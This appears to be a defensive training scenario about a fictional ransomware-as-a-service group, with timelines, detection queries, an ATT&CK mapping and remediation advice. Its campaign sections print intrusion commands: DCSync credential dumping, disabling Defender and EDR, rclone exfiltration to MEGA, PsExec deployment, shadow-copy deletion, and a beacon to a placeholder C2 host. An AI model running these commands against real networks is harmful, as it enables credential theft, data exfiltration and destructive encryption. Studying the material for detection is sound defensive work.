Skip to content

SC-060: Ransomware-as-a-Service Platform

Scenario Overview

This scenario examines the complete lifecycle of a Ransomware-as-a-Service (RaaS) operation run by the criminal group "DARK FOUNDRY." Unlike single-incident scenarios, this walkthrough covers both the operator and affiliate perspectives: platform development, affiliate recruitment, customizable payload generation, multi-victim campaigns, double extortion, and payment infrastructure. Over a 3-month campaign, DARK FOUNDRY affiliates compromise 47 organizations across manufacturing, healthcare, and professional services, collecting $12M in total ransoms. Three hospitals are forced to divert patients, and one victim's data is published on the group's leak site after failed negotiations.

Environment: Multiple victim networks; RaaS platform at darkfoundry.example.onion; C2 infrastructure across 203.0.113.0/24 Initial Access: Varies by affiliate — exploits, phishing, access brokers (T1190, T1566, T1078) Impact: 47 organizations compromised, $12M total ransoms, 3 hospitals diverted patients, 1 data leak Difficulty: Moderate-Advanced (platform lowers barrier for affiliates) Sector: Multi-sector — Healthcare, Manufacturing, Professional Services

Threat Actor Profile

DARK FOUNDRY operates as a RaaS platform provider, developing and maintaining the ransomware tooling, infrastructure, and payment systems while recruiting affiliates to conduct the actual intrusions. The group consists of ~15 core developers and operators, with 30-40 active affiliates at any given time. DARK FOUNDRY takes a 20-30% cut of all ransom payments, with the remaining 70-80% going to affiliates.

Motivation: Financial — platform revenue via affiliate commission model Capability: High — custom ransomware development, bullet-proof hosting, cryptocurrency laundering Target Sectors: Opportunistic — affiliates select targets; platform provides tools Business Model: SaaS-style criminal enterprise with tiered affiliate access Revenue (estimated): $12M in ransom payments over 3 months (DARK FOUNDRY share: ~$3M)

RaaS Ecosystem Context

Ransomware-as-a-Service has industrialized cybercrime:

  • Low barrier to entry: Affiliates need only basic intrusion skills; the platform handles payload generation, encryption, negotiation, and payment
  • Specialization: Access brokers sell initial access, affiliates deploy ransomware, operators manage infrastructure — each role specializes
  • Scale: A single RaaS platform enables dozens of simultaneous campaigns across hundreds of victims
  • Evolution: Modern RaaS platforms offer web dashboards, affiliate support, victim negotiation portals, and automatic cryptocurrency tumbling
  • Double extortion: Data exfiltration before encryption has become standard, ensuring payment pressure even when backups exist

Attack Timeline

Platform Operations Timeline

Timestamp Phase Action
2025-11-01 Development DARK FOUNDRY launches v3.0 of ransomware builder platform
2025-11-15 Recruitment Affiliate recruitment campaign on criminal forums
2025-12-01 Operations Begin First affiliates onboarded; initial victim campaigns launched
2025-12-15 First Payment First ransom payment received ($340,000 from manufacturing firm)
2026-01-10 Scaling 35 active affiliates; victim count reaches 20 organizations
2026-02-01 Healthcare Attacks Affiliate "BONE SAW" hits 3 hospitals in a single week
2026-02-15 Data Leak Failed negotiation — victim data published on leak site
2026-03-01 Peak Operations 47 total victims; $12M in collected ransoms
2026-03-10 Law Enforcement Joint FBI/Europol operation seizes 2 of 5 C2 servers

Representative Affiliate Campaign (Affiliate "RUSTED NAIL")

Timestamp (UTC) Phase Action
2026-01-05 14:00:00 Access Purchase Purchased VPN credentials for Apex Manufacturing from access broker
2026-01-06 02:30:00 Initial Access VPN login to 10.30.0.0/16 using purchased credentials
2026-01-06 03:00:00 Discovery AD enumeration via SharpHound; network mapping
2026-01-06 08:00:00 Credential Access DCSync attack; obtained Domain Admin credentials
2026-01-07 01:00:00 Exfiltration 450 GB exfiltrated via MEGA cloud storage (rclone)
2026-01-08 03:00:00 Impact DARK FOUNDRY ransomware deployed across 340 endpoints
2026-01-08 03:30:00 Extortion Ransom note: $2.1M demand with 72-hour countdown
2026-01-10 Negotiation Victim negotiates via Tor portal; settles at $890,000
2026-01-11 Payment Bitcoin payment to bc1qexampledf01...REDACTED
2026-01-11 Split 75% to RUSTED NAIL ($667,500), 25% to DARK FOUNDRY ($222,500)

Technical Analysis

Phase 1: RaaS Platform Architecture

DARK FOUNDRY operates a sophisticated criminal SaaS platform accessible via Tor hidden service.

# DARK FOUNDRY RaaS platform architecture (from law enforcement takedown analysis)

# Platform URL: http://darkfoundry[REDACTED].onion (Tor hidden service)
# Registration: invite-only, vouched by existing affiliate or purchased for $5,000

# Platform components:
# 1. Affiliate Dashboard (React frontend)
#    - Campaign management: create, configure, monitor attacks
#    - Victim tracker: status, negotiation stage, payment received
#    - Payload builder: customizable ransomware binary generation
#    - Earnings dashboard: payment history, commission tracking
#
# 2. Payload Builder Service
#    - Generates unique ransomware binaries per campaign
#    - Configuration options:
#      - Target OS: Windows (PE), Linux (ELF), VMware ESXi
#      - Encryption: AES-256-CTR + RSA-4096 (hybrid)
#      - File extensions to target (customizable whitelist)
#      - Excluded paths (keep OS bootable)
#      - Process kill list (databases, backup software, AV)
#      - Ransom note template (customizable per victim)
#      - C2 callback URL (per-affiliate infrastructure)
#      - Self-deletion timer (anti-forensics)
#
# 3. Victim Negotiation Portal
#    - Unique Tor .onion URL per victim
#    - Chat interface between victim and "support team"
#    - Countdown timer with automatic price increase
#    - Proof-of-decryption feature (decrypt 2 files free)
#    - Payment verification and decryptor delivery
#
# 4. Payment Infrastructure
#    - Bitcoin and Monero accepted
#    - Automatic payment splitting (affiliate/operator)
#    - Cryptocurrency tumbling via chain-hopping
#    - Payout to affiliates via Monero (privacy coin)
#
# 5. Leak Site
#    - Public Tor site listing non-paying victims
#    - Sample data published as pressure tactic
#    - Full data dump after negotiation deadline expires

Phase 2: Affiliate Toolkit and Payload Generation

An affiliate uses the DARK FOUNDRY dashboard to generate a customized ransomware payload for a specific victim.

# Payload generation (from captured affiliate dashboard interaction)

# Affiliate: RUSTED NAIL (affiliate ID: AF-0047)
# Campaign: APEX-MFG-2026-01
#
# Builder configuration submitted via dashboard:
# {
#   "campaign_id": "APEX-MFG-2026-01",
#   "target_os": "windows_x64",
#   "encryption_algo": "aes256ctr_rsa4096",
#   "target_extensions": [
#     ".docx", ".xlsx", ".pdf", ".pst", ".sql", ".bak",
#     ".mdb", ".dwg", ".cad", ".sldprt", ".step", ".iges"
#   ],
#   "exclude_paths": [
#     "C:\\Windows", "C:\\Program Files\\*\\*.exe",
#     "C:\\Program Files (x86)\\*\\*.exe"
#   ],
#   "process_kill_list": [
#     "sqlservr.exe", "oracle.exe", "veeam*",
#     "backup*", "MsMpEng.exe", "SentinelAgent.exe"
#   ],
#   "service_stop_list": [
#     "MSSQLSERVER", "OracleServiceXE", "VeeamBackupSvc",
#     "WinDefend", "SentinelAgent"
#   ],
#   "ransom_amount_usd": 2100000,
#   "deadline_hours": 72,
#   "c2_urls": [
#     "https://update-service.example.com/api/v1/check",
#     "https://cdn-static.example.com/health"
#   ],
#   "note_template": "dark_foundry_v3_manufacturing"
# }
#
# Generated payload:
# Filename: sysupdate.exe
# SHA256: b3c4d5e6f7g8...REDACTED
# Size: 847 KB
# Packer: custom UPX variant with anti-analysis
# C2 protocol: HTTPS with domain fronting
# Persistence: scheduled task "WindowsSystemUpdate"

Phase 3: Representative Affiliate Campaign — RUSTED NAIL vs. Apex Manufacturing

# Affiliate RUSTED NAIL campaign against Apex Manufacturing
# Network: 10.30.0.0/16 | Domain: apex-mfg.example.com

# Step 1: Initial access via purchased VPN credentials
# Source: access broker "TUNNEL_KING" on criminal forum
# Purchased: VPN credentials for apex-mfg.example.com
# Price: $3,500 (valid SSL-VPN account)
# Credentials: testuser/REDACTED (VPN account: ext-contractor-07)
# Login source: 203.0.113.101 (affiliate VPN exit)

# Step 2: Internal reconnaissance (from EDR telemetry)
# ProcessCreate: C:\Users\ext-contractor-07\SharpHound.exe
# CommandLine: SharpHound.exe -c All --outputdirectory C:\Users\Public\
# Output: 20260106_030122_BloodHound.zip (AD collection)

# Step 3: Privilege escalation via DCSync
# Mimikatz: lsadump::dcsync /domain:apex-mfg.example.com /user:krbtgt
# Event 4662: DS-Replication-Get-Changes-All from 10.30.5.50
# Obtained: Domain Admin hash for APEX-MFG\da-admin

# Step 4: Disable security tools
# PsExec to endpoints:
# cmd /c net stop SentinelAgent /y
# cmd /c net stop WinDefend /y
# cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
#        /v DisableAntiSpyware /t REG_DWORD /d 1 /f
# Disabled AV/EDR on 340 endpoints over 2 hours
# Event: Microsoft-Windows-Security-Auditing 4689 (process termination)

Phase 4: Data Exfiltration and Ransomware Deployment

# Step 5: Data staging and exfiltration
# Targeted shares:
#   \\FILE01.apex-mfg.example.com\Engineering\   — 180 GB (CAD files, blueprints)
#   \\FILE01.apex-mfg.example.com\Finance\        — 120 GB (financial records)
#   \\FILE01.apex-mfg.example.com\HR\             — 85 GB (employee PII)
#   \\SQL01\Backups\                               — 65 GB (ERP database)

# Exfiltration via rclone to MEGA cloud storage:
# C:\Users\Public\rclone.exe copy "\\FILE01\Engineering" mega:exfil-apex
#   --transfers 4 --bwlimit 40M
# Duration: ~8 hours for 450 GB total
# Destination: MEGA account registered with disposable email

# Step 6: Ransomware deployment via PsExec and GPO
# Method 1 (servers): PsExec with Domain Admin credentials
# psexec.exe \\10.30.1.10 -u APEX-MFG\da-admin -p REDACTED
#   -c sysupdate.exe -accepteula

# Method 2 (workstations): GPO scheduled task
# GPO: "Security Compliance Update — January 2026"
# Task: Run sysupdate.exe at 03:00 UTC on all domain workstations
# Affected: 340 endpoints across 3 sites

# Ransomware execution sequence (per endpoint):
# 1. Kill processes: sqlservr.exe, oracle.exe, veeam*, backup*
# 2. Stop services: MSSQLSERVER, VeeamBackupSvc, WinDefend
# 3. Delete shadow copies: vssadmin delete shadows /all /quiet
# 4. Disable recovery: bcdedit /set {default} recoveryenabled No
# 5. Encrypt files matching target extension list
# 6. Drop ransom note: DARK_FOUNDRY_RECOVERY.txt
# 7. Beacon to C2: POST https://update-service.example.com/api/v1/check
#    Body: {"id":"APEX-MFG-2026-01","status":"complete","files":142857}
# 8. Self-delete after 60 minutes: schtasks /delete /tn "selfclean" /f

Phase 5: Negotiation and Payment

# Ransom note content (from DARK_FOUNDRY_RECOVERY.txt):

# ============================================================
# DARK FOUNDRY — YOUR NETWORK HAS BEEN COMPROMISED
# ============================================================
#
# What happened?
# Your files have been encrypted with AES-256 + RSA-4096.
# We have also downloaded 450 GB of your confidential data.
#
# What we took:
# - Engineering blueprints and CAD files
# - Financial records and tax filings
# - Employee personal information (SSN, bank details)
# - ERP database backups
#
# What you need to do:
# 1. Visit: http://df-negot-[REDACTED].onion
# 2. Enter your ID: APEX-MFG-2026-01
# 3. Follow instructions to pay $2,100,000 in Bitcoin
#
# Deadline: 72 hours. After deadline, price doubles.
# After 7 days, your data will be published on our leak site.
#
# DO NOT:
# - Contact law enforcement (we monitor for this)
# - Attempt to decrypt files yourself (you will destroy them)
# - Shut down systems (encryption keys are in memory)
# ============================================================

# Negotiation log (from captured Tor portal):
# 2026-01-08 10:00 — Victim opens negotiation portal
# 2026-01-08 10:05 — Victim: "We need proof you have our data"
# 2026-01-08 10:30 — Operator shares 3 sample files (financial statements)
# 2026-01-08 11:00 — Victim: "We need to verify decryption works"
# 2026-01-08 11:15 — Operator decrypts 2 victim-selected files (proof)
# 2026-01-09 09:00 — Victim: "Our insurance covers $900K max"
# 2026-01-09 10:00 — Operator: "Final offer: $890,000. Take it or data leaks."
# 2026-01-10 14:00 — Victim agrees to $890,000
# 2026-01-11 02:00 — Payment: 13.5 BTC to bc1qexampledf01...REDACTED
# 2026-01-11 02:15 — Automatic split: 10.125 BTC to affiliate, 3.375 BTC to DARK FOUNDRY
# 2026-01-11 02:30 — Decryptor delivered via Tor portal
# 2026-01-11 03:00 — Cryptocurrency tumbled through 4-hop chain before withdrawal

Phase 6: Healthcare Campaign — Affiliate "BONE SAW"

# Healthcare campaign overview (from combined victim reporting)
# Affiliate: BONE SAW (affiliate ID: AF-0062)
# Targets: 3 regional hospitals in a single week

# Victim 1: Riverside General Hospital (10.40.0.0/16)
# Access: Exploited Citrix NetScaler vulnerability (CVE-2024-XXXXX simulated)
# Encrypted: 890 endpoints including imaging systems (PACS)
# Impact: Emergency diversion for 36 hours
# Ransom: $1.8M demanded, $750K paid
# Patient impact: 142 patients diverted to other facilities

# Victim 2: St. Catherine Medical Center (10.41.0.0/16)
# Access: Phishing email to billing department
# Encrypted: 450 endpoints including EHR system
# Impact: Emergency diversion for 48 hours
# Ransom: $1.2M demanded, REFUSED — restored from backups in 5 days
# Data published on leak site (12,000 patient records)

# Victim 3: Oakwood Community Hospital (10.42.0.0/16)
# Access: RDP brute force (exposed after firewall misconfiguration)
# Encrypted: 320 endpoints
# Impact: Emergency diversion for 24 hours
# Ransom: $900K demanded, $400K paid
# Patient impact: 1 patient death potentially linked to diversion (under investigation)

# DARK FOUNDRY platform response to healthcare attacks:
# Internal affiliate channel message (from law enforcement intercept):
# "BONE SAW — hospitals are high risk, high reward. We don't prohibit it,
#  but you're on your own if law enforcement gets aggressive. We've updated
#  our affiliate agreement — healthcare victims require 48-hour approval
#  before data publication on leak site."

Detection Opportunities

KQL — RaaS Payload Behavioral Indicators

// Detect common RaaS ransomware execution patterns
DeviceProcessEvents
| where TimeGenerated > ago(1h)
| where FileName in ("vssadmin.exe", "wmic.exe", "bcdedit.exe")
| where ProcessCommandLine has_any (
    "delete shadows", "shadowcopy delete",
    "recoveryenabled No", "bootstatuspolicy ignoreallfailures"
  )
| summarize
    CommandCount = count(),
    UniqueCommands = dcount(ProcessCommandLine),
    Commands = make_set(ProcessCommandLine),
    Devices = make_set(DeviceName)
    by InitiatingProcessFileName, bin(TimeGenerated, 5m)
| where CommandCount > 1
| sort by CommandCount desc

KQL — Security Tool Tampering Across Multiple Endpoints

// Detect mass disabling of security tools (pre-ransomware indicator)
DeviceProcessEvents
| where TimeGenerated > ago(4h)
| where ProcessCommandLine has_any (
    "net stop", "sc stop", "taskkill",
    "DisableAntiSpyware", "DisableRealtimeMonitoring"
  )
| where ProcessCommandLine has_any (
    "Defender", "Sentinel", "CrowdStrike", "Carbon", "Symantec",
    "McAfee", "Sophos", "ESET", "Trend", "WinDefend"
  )
| summarize
    TamperCount = count(),
    AffectedDevices = dcount(DeviceName),
    DeviceList = make_set(DeviceName),
    Commands = make_set(ProcessCommandLine)
    by AccountName, bin(TimeGenerated, 30m)
| where AffectedDevices > 3
| sort by AffectedDevices desc

KQL — Common RaaS Affiliate TTP Fingerprinting

// Detect TTP patterns shared across RaaS affiliate campaigns
let affiliate_indicators = dynamic([
    "SharpHound", "BloodHound", "Rubeus", "Mimikatz",
    "rclone", "megacmd", "psexec", "wmiexec"
]);
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName has_any (affiliate_indicators)
    or ProcessCommandLine has_any (affiliate_indicators)
| summarize
    ToolCount = dcount(FileName),
    ToolsUsed = make_set(FileName),
    FirstSeen = min(TimeGenerated),
    LastSeen = max(TimeGenerated)
    by DeviceName, AccountName
| where ToolCount >= 3
| extend AttackDuration = datetime_diff('hour', LastSeen, FirstSeen)
| sort by ToolCount desc

KQL — Cryptocurrency Payment Infrastructure Detection

// Detect access to known ransomware payment and negotiation portals
DeviceNetworkEvents
| where TimeGenerated > ago(7d)
| where RemoteUrl has ".onion" or RemoteUrl has "tor2web"
    or RemoteUrl has_any ("negot", "payment", "decrypt", "recover")
| summarize
    ConnectionCount = count(),
    UniqueURLs = dcount(RemoteUrl),
    URLs = make_set(RemoteUrl),
    Devices = make_set(DeviceName)
    by bin(TimeGenerated, 1h)
| where ConnectionCount > 0
| sort by TimeGenerated desc

SPL — Mass GPO Deployment Detection (Ransomware Distribution)

index=wineventlog sourcetype="xmlwineventlog:security"
  (EventCode=5136 OR EventCode=5137)
  ObjectClass="groupPolicyContainer"
| stats count as gpo_changes
        values(AttributeLDAPDisplayName) as modified_attributes
        values(ObjectDN) as gpo_objects
        by SubjectUserName Computer span=1h
| where gpo_changes > 2
| eval has_scripts=if(match(modified_attributes, "(?i)script"), "YES", "NO")
| where has_scripts="YES"
| eval severity="CRITICAL"
| sort -gpo_changes

SPL — RaaS C2 Beacon Pattern Detection

index=proxy sourcetype="squid" OR sourcetype="bluecoat"
  cs_method=POST
| eval uri_path=lower(cs_uri_path)
| where match(uri_path, "/(api|check|health|update|status|beacon)")
| stats count as callbacks
        avg(bytes_out) as avg_post_size
        stdev(bytes_out) as stdev_post_size
        values(cs_uri_path) as paths
        by src_ip dest_host span=1h
| where callbacks > 10
| where stdev_post_size < 50
| eval regularity_score=if(stdev_post_size < 20 AND callbacks > 20, "HIGH", "MEDIUM")
| where regularity_score IN ("HIGH", "MEDIUM")
| sort -callbacks

SPL — Cross-Victim TTP Correlation

index=threat_intel sourcetype="ioc_feed"
  ioc_type="sha256" OR ioc_type="domain" OR ioc_type="ip"
| lookup internal_detections.csv ioc_value OUTPUT detection_count victim_org
| where detection_count > 0
| stats dc(victim_org) as orgs_affected
        values(victim_org) as org_list
        values(ioc_type) as ioc_types
        by ioc_value
| where orgs_affected > 1
| eval raas_indicator=if(orgs_affected > 3, "HIGH - likely RaaS platform IOC",
    "MEDIUM - shared infrastructure")
| sort -orgs_affected

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Scenario Phase
Resource Development T1587.001 Develop Capabilities: Malware RaaS platform and payload builder
Initial Access T1190 Exploit Public-Facing Application Citrix exploitation (BONE SAW)
Initial Access T1078 Valid Accounts Purchased VPN credentials
Initial Access T1566.001 Phishing: Spearphishing Attachment Phishing-based affiliate access
Execution T1059.001 Command and Scripting Interpreter: PowerShell Post-exploitation tooling
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools AV/EDR termination on endpoints
Defense Evasion T1027 Obfuscated Files or Information Custom-packed ransomware binary
Credential Access T1003.006 OS Credential Dumping: DCSync Domain Admin credential theft
Exfiltration T1567.002 Exfiltration Over Web Service: to Cloud Storage Rclone to MEGA cloud storage
Impact T1486 Data Encrypted for Impact Ransomware deployment
Impact T1490 Inhibit System Recovery Shadow copy and recovery deletion

Impact Assessment

Category Impact
Financial $12M total ransoms collected across 47 victims in 3 months
Healthcare 3 hospitals diverted patients; 1 patient death under investigation
Data Exposure 1 victim's data (12,000 patient records) published on leak site
Operational Average 5-day recovery per victim; some exceeded 14 days
Regulatory HIPAA violations for healthcare victims; SEC disclosure for public companies
Economic Estimated $180M total cost across all victims (recovery + downtime + legal)

Remediation & Hardening

  1. Implement access broker defense — monitor dark web markets for compromised credentials; enforce MFA on all remote access (VPN, RDP, Citrix) to invalidate stolen credentials
  2. Deploy application control — whitelist approved executables on servers and critical systems; block rclone, PsExec (unauthorized), and common attacker tools
  3. Harden Active Directory — use Group Managed Service Accounts (gMSA), implement tiered administration, monitor for DCSync and Kerberoasting attacks
  4. Implement immutable backups — air-gapped or immutable backup copies that cannot be deleted or encrypted by ransomware; test restoration regularly
  5. Deploy EDR with tamper protection — endpoint detection that resists process termination and registry modification by attackers
  6. Monitor GPO changes — alert on new GPO creation, especially those containing startup scripts or scheduled tasks; require change management approval
  7. Segment critical systems — isolate healthcare/OT systems, backup infrastructure, and domain controllers from general user networks
  8. Participate in threat intelligence sharing — join sector-specific ISACs to receive and contribute RaaS IOCs for cross-victim correlation
  9. Develop ransomware-specific IR playbook — pre-authorize containment decisions, establish communication protocols, and identify cryptocurrency tracing resources
  10. Evaluate cyber insurance coverage — ensure policies cover ransomware extortion, data breach notification, and business interruption with realistic limits

Discussion Questions

  1. The RaaS model enables operators to profit without conducting intrusions, while affiliates profit without developing malware. How does this specialization change the threat landscape, and what implications does it have for law enforcement disruption strategies?

  2. DARK FOUNDRY affiliates used access brokers to purchase initial entry to victim networks. What proactive measures can organizations take to detect and invalidate credentials being sold on criminal marketplaces?

  3. Affiliate "BONE SAW" attacked three hospitals, forcing patient diversions and potentially contributing to a patient death. Should RaaS operators face criminal liability for affiliate actions? How does this compare to legitimate platform liability models?

  4. One victim refused to pay and had data published on the leak site. Another paid $890K (negotiated down from $2.1M). What factors should inform the decision to pay or refuse, and how should cyber insurance influence this calculus?

  5. The DARK FOUNDRY platform was partially disrupted by law enforcement (2 of 5 C2 servers seized). How do RaaS operators build resilience into their infrastructure, and what does this mean for sustained law enforcement operations?

  6. Cross-victim TTP correlation revealed that multiple victims shared the same attacker tools, C2 infrastructure, and operational patterns. How can defenders leverage this intelligence to detect and respond to RaaS campaigns before their organization becomes a victim?

Cross-References